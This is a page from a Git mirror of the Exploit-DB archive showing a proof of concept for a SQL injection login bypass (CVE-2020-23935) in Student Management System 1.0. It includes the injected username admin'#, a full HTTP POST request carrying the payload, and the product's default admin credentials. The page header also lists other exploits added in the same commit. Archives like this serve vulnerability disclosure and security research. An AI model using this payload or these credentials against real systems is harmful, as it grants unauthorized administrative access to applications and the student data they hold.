bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50579.txt
Offensive Security c906261f2c DB: 2021-12-10 
11 changes to exploits/shellcodes

MTPutty 1.0.1.21 - SSH Password Disclosure

Raspberry Pi 5.10 - Default Credentials
Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated)
LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
TestLink 1.19 - Arbitrary File Download (Unauthenticated)
Student Management System 1.0 - SQLi Authentication Bypass
Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass
Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
2021-12-10 05:02:03 +00:00

34 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

# Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass
# Date: 2020-07-06
# Exploit Author: Enes Özeser
# Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html
# Version: 1.0
# Tested on: Windows & WampServer
# CVE: CVE-2020-23935
1- Go to following url. >> http://(HOST)/admin/login.php
2- We can login succesfully with SQL bypass method.
-- Username = admin'#
-- Password = (Write Something)
NOTE: Default username and password is admin:admin.
(( HTTP Request ))
POST /process.php HTTP/1.1
Host: (HOST)
Connection: keep-alive
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://(HOST)/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://(HOST)/index.php?q=login
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl
U_USERNAME=admin'#&U_PASS=123123&sidebarLogin=
Reference in a new issue View git blame Copy permalink